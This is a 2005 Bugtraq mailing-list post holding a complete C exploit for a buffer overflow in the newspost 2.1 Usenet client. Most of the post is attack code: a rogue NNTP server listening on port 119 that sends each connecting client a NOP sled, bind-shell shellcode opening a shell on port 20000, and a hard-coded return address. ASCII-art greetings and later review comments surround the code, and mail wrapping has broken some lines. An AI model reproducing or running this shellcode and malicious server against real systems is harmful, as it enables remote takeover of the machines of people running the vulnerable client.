Message-ID: <20050203000454.3746.qmail@www.securityfocus.com>
Date: 3 Feb 2005 00:04:54 -0000
From: <cybertronic@....net>
To: bugtraq@...urityfocus.com
Subject: RE: SECURITEY.NNOV.RU NewsPost buffer overflow [EXPLOIT]




/* 
02/03/2005 
NOTES: -Newspost "socket_getline()" Buffer Overflow 
Exploit 
 
Client Usage 
------------ 
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n 
cyber -s tronic <file> 
 
Greetz fly to my girlfriend YASMIN H. 
 
                                                    ? 
                                                   ?M 
                   M                              
?MMM 
                   MMm                           
?MMMM 
                   M$$MMm                       
?MMMMM. 
                   MM$$MMMMm                   
MMMMMMMM 
                   `MM$$MMMMMMm               4MMMM$
$MM 
                    MMM$$MMMMMMMMm           ?MMMM$
$MMM 
                     MMM$$$MMMMMMMMm         mMMMM
$MMMM 
                      `MMM$$$MMMMMMMm        MMMM
$MMMM? 
                        MMMM$$$MMMMMMMm      MMM$
$MMM? 
                         `MMMMMMMMMMMMMm     MMMMMMM? 
                           `MMMMMMMMMMMMMm   MMMMMM 
                              `MMMMMMMMMMMM  MMMMM 
                                 `MMMMMMMMMM MMMMM 
                                    `MMMMMMMMMMMM 
                                      MMMMMMMMMMM 
                               mmMMMMMMMMMMMMMMMMM 
                           mmMMMMMMMMMMMMMMMMMMMMMM 
                          ?MMM#MMMMMMMMMMMMMMMMMMMMm 
                        4MMM<º >MMMMMMMMMMMMMMMMMMMM 
                       MMMMMm_ mMMMMMMMMMMMMMMMMMMMM 
                      4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM 
                        MMMMMMMMMMMMMMMMMMMMMMMMMMMM 
       ?Mn               ?MMMMMMMMMMMMMMMMMMMMMMMMM            
?Mnn 
       nM                  `MMMMMMMMMMMMMMMMMMMMMM?              
n? 
        `?                    MMMMMMMMMMMMMMMMM?                
n? 
                                     MMMMMM? 
                                    mtr? 
 
 
     mMMM           nmM                         mM 
   mM??  M          ' M                          n 
 mM$                 nM                       n?MMn?Ä 
4M               m   ?M                      N   ?                           
?` 
m?       `n?    mM  NM?                         NM 
mM        mMm  nm   M??MÄ?     n?Mm   ?n  xnÄ,  ?   
?n  xnÄ  ?Mm   Mn n?     nM   nMm 
 mM        `mMM?   nM     M   nM  ,`   ?n?  y   M    
?n?  y nM  ?   nM  Ä    Ä   ? 
  M?         M'    ?Ä      M  n.,?     nm      nM    
nM     n   M   ?   Ä    ?  n 
   MM?  mM   M    nM Ä    M?  n    ,  nM       ?Ä   
nM      M  nM   M   M   M?  M   n 
     MMM?   M?   nM   MÄÄM     n?nN  ?M       nM   ?M       
`?M?   ??  .N  nM    ?nM? 
           M? 
         n?                                              
cybertronic 2oo5 
        ?                                        
________________ 
                                                    ----------------------/ 
 
 
 
                MMMMMMMMm                            
mMMMMMMM? 
             ?MM$MMMMMMMMMm                        
mMMMMMMMMM$MM` 
             MMMMMMMMMMMMMMMm                    
mMMMMMMMMMMMMMMM 
             MMMMMMMMMMMMMMMMMM                
MMMMMMMMMMMMMMMMMM 
             MMMMMMMMMMMMMMMMMMMM            
MMMMMMMMMMMMMMMMMMMM 
               `MMMMMMMMMMMMMMMMMM          
MMMMMMMMMMM(c)MMMM? 
 
                ºÕÍÄúú  just want to say love you 
dad!  úúÄÍÕº 
*/ 
 
#include <stdio.h> 
#include <strings.h> 
#include <signal.h> 
#include <netinet/in.h> 
#include <netdb.h> 
 
#define RED	"\E[31m\E[1m" 
#define GREEN	"\E[32m\E[1m" 
#define YELLOW	"\E[33m\E[1m" 
#define BLUE	"\E[34m\E[1m" 
#define NORMAL	"\E[m" 
 
#define PORT	119 
#define BACKLOG 5 
 
//92 bytes bindcode port 20000 
char scode[] = 
"\x31\xdb"				// xor	   
ebx, ebx 
"\xf7\xe3"				// mul	   
ebx 
"\xb0\x66"				// mov     
al, 102 
"\x53"					// push    
ebx 
"\x43"					// inc     
ebx 
"\x53"					// push    
ebx 
"\x43"					// inc     
ebx 
"\x53"					// push    
ebx 
"\x89\xe1"				// mov     
ecx, esp 
"\x4b"					// dec     
ebx 
"\xcd\x80"				// int     
80h 
"\x89\xc7"				// mov     
edi, eax 
"\x52"					// push    
edx 
"\x66\x68\x4e\x20"			// push    
word 8270 
"\x43"					// inc     
ebx 
"\x66\x53"				// push    bx 
"\x89\xe1"				// mov     
ecx, esp 
"\xb0\xef"				// mov	   
al, 239 
"\xf6\xd0"				// not	   al 
"\x50"					// push	   
eax 
"\x51"					// push    
ecx 
"\x57"					// push    
edi 
"\x89\xe1"				// mov     
ecx, esp 
"\xb0\x66"				// mov     
al, 102 
"\xcd\x80"				// int     
80h 
"\xb0\x66"				// mov     
al, 102 
"\x43"					// inc	   
ebx 
"\x43"					// inc	   
ebx 
"\xcd\x80"				// int     
80h 
"\x50"					// push	   
eax 
"\x50"					// push	   
eax 
"\x57"					// push	   
edi 
"\x89\xe1"				// mov	   
ecx, esp 
"\x43"					// inc	   
ebx 
"\xb0\x66"				// mov	   
al, 102 
"\xcd\x80"				// int	   
80h 
"\x89\xd9"				// mov	   
ecx, ebx 
"\x89\xc3"				// mov     
ebx, eax 
"\xb0\x3f"				// mov     
al, 63 
"\x49"					// dec     
ecx 
"\xcd\x80"				// int     
80h 
"\x41"					// inc     
ecx 
"\xe2\xf8"				// loop    lp 
"\x51"					// push    
ecx 
"\x68\x6e\x2f\x73\x68"			// push    
dword 68732f6eh 
"\x68\x2f\x2f\x62\x69"			// push    
dword 69622f2fh 
"\x89\xe3"				// mov     
ebx, esp 
"\x51"					// push    
ecx 
"\x53"					// push	   
ebx 
"\x89\xe1"				// mov	   
ecx, esp 
"\xb0\xf4"				// mov	   
al, 244 
"\xf6\xd0"				// not	   al 
"\xcd\x80";				// int     
80h 
 
void cmd ( int connfd ); 
void header (); 
 
/* 
 * Entry point.  The program is the *server* side of a client-side attack: 
 * it listens on PORT (119, NNTP) and, for every client that connects, 
 * forks a child that calls cmd() to send the overlong line.  Nothing is 
 * attacked unless a newspost client is pointed at this host, so the 
 * exposure a defender should watch for is an NNTP client talking to an 
 * untrusted server, not inbound traffic to the client. 
 * argc/argv are unused; the process never returns normally (infinite 
 * accept loop, exit() on socket errors). 
 */ 
int 
main ( int argc, char* argv[] ) 
{ 
	int listenfd, connfd; 
	pid_t childpid; 
	socklen_t clilen; 
	struct sockaddr_in cliaddr, servaddr; 
 
	header (); 
	printf ( "[*] Creating socket..." ); 
	if ( ( listenfd = socket ( AF_INET, 
SOCK_STREAM, 0 ) ) == -1 ) 
	{ 
        	printf ( RED "FAILED!\n" NORMAL ); 
        	exit ( 1 ); 
	} 
	printf ( GREEN "OK!\n" NORMAL ); 
	bzero ( &servaddr, sizeof ( servaddr ) ); 
	servaddr.sin_family = AF_INET; 
	/* Binds to every local interface, not just loopback. */ 
	servaddr.sin_addr.s_addr = htonl 
( INADDR_ANY ); 
	servaddr.sin_port = htons ( PORT ); 
 
	/* NOTE(review): bind() return value is ignored; a failure (e.g. port 
	 * already in use, or no privilege for port 119) is only noticed when 
	 * listen()/accept() later fail. */ 
	bind ( listenfd, ( struct sockaddr * ) 
&servaddr, sizeof ( servaddr ) ); 
	printf ( "[*] Listening..." ); 
	if ( listen ( listenfd, BACKLOG ) == -1 ) 
	{ 
		printf ( RED "FAILED!\n" NORMAL ); 
		exit ( 1 ); 
	} 
	printf ( GREEN "OK!\n" NORMAL ); 
 
	for ( ; ; ) 
	{ 
		clilen = sizeof ( cliaddr ); 
 
		if ( ( connfd = accept ( listenfd, 
( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 ) 
		{ 
			close ( listenfd ); 
			exit ( 1 ); 
		} 
 
		/* One child per connection.  NOTE(review): the child never exits 
		 * after cmd() returns -- it falls through to close(connfd) and 
		 * keeps looping on the listenfd it has already closed, so accept() 
		 * fails there and the child exits via the branch above.  The parent 
		 * also never reaps children (no wait()/SIGCHLD handling). */ 
		if ( ( childpid = fork ( ) ) == 0 ) 
		{ 
			close ( listenfd ); 
			printf ( "[*]" GREEN " 
Incomming connection from:\t %s\n" NORMAL, inet_ntoa 
( cliaddr.sin_addr ) ); 
			cmd ( connfd ); 
		} 
		close ( connfd ); 
	} 
} 
 
/* 
 * Builds the oversized response and writes it to one connected client. 
 * 
 * out[] (1200 bytes) is zeroed, then filled as: 956 bytes of 0x90, the 
 * scode payload (copied with memcpy, including its terminating NUL), 
 * four 0x41 bytes appended with strcat, and finally the four raw bytes 
 * of ret appended with strncat.  Everything after the first NUL byte in 
 * out[] is ignored by strlen()/write(), so the send length depends on 
 * the payload containing no NUL bytes. 
 * 
 * ret is a single hard-coded stack address, so this lines up with only 
 * one specific build and stack layout of the client; there is no 
 * address guessing or retry logic. 
 * 
 * s: connected socket descriptor.  Exits the process on write failure. 
 */ 
void 
cmd ( int s ) 
{ 
	char in[1024], out[1200]; 
	unsigned long ret = 0xbfffecb8; 
 
	bzero ( &out, 1200 ); 
	memset ( out, 0x90, 956 ); //956 
	memcpy ( out + 956, scode, sizeof 
( scode ) ); 
	strcat ( out, "\x41\x41\x41\x41" ); 
	/* Appends the address bytes verbatim; the unsigned char* cast does 
	 * not match strncat's const char* parameter. */ 
	strncat ( out, ( unsigned char* ) &ret, 4 ); 
	/* NOTE(review): strlen() returns size_t, but the format uses %u; 
	 * %zu would be the matching specifier. */ 
	printf ( "[*] Sending Bad Packet [ %u 
bytes ]...", strlen ( out ) ); 
	if ( write ( s, out, strlen ( out ) ) <= 0 ) 
	{ 
		printf ( RED "FAILED!\n" NORMAL); 
		exit ( 1 ); 
	} 
	printf ( GREEN "OK!\n" NORMAL); 
	/* Short pause before the caller closes the descriptor. */ 
	sleep ( 1 ); 
} 
 
/* 
 * Clears the terminal and prints the coloured banner. 
 * 
 * NOTE(review): system ( "clear" ) spawns a shell and resolves "clear" 
 * through the caller's PATH; it is purely cosmetic here.  The banner 
 * string literals below are broken across physical lines by the mail 
 * wrapping, so this listing does not compile as-is without rejoining 
 * them. 
 */ 
void 
header () 
{ 
	system ( "clear" ); 
	printf ( RED "### " GREEN "# # " YELLOW "###  
" BLUE "### " RED "###  " GREEN "### " YELLOW "###  " 
BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" 
NORMAL); 
	printf ( RED "#   " GREEN "# # " YELLOW "#  # 
" BLUE "#   " RED "#  # " GREEN " #  " YELLOW "#  # " 
BLUE "# # " RED "##  # " GREEN "# " YELLOW "#  \n" 
NORMAL); 
	printf ( RED "#   " GREEN "# # " YELLOW "###  
" BLUE "### " RED "###  " GREEN " #  " YELLOW "###  " 
BLUE "# # " RED "# # # " GREEN "# " YELLOW "#  \n" 
NORMAL); 
	printf ( RED "#   " GREEN " #  " YELLOW "#  # 
" BLUE "#   " RED "# #  " GREEN " #  " YELLOW "# #  " 
BLUE "# # " RED "#  ## " GREEN "# " YELLOW "#  \n" 
NORMAL); 
	printf ( RED "### " GREEN " #  " YELLOW "###  
" BLUE "### " RED "#  # " GREEN " #  " YELLOW "#  # " 
BLUE "### " RED "#   # " GREEN "# " YELLOW "###\n" 
NORMAL); 
	printf ( RED "                
cybertronic@....net\n" NORMAL ); 
	printf ( RED "                  ----------(c) 
2005----------\n\n" NORMAL ); 
	printf ( "newspost-2.1\n\n" ); 
} 
 

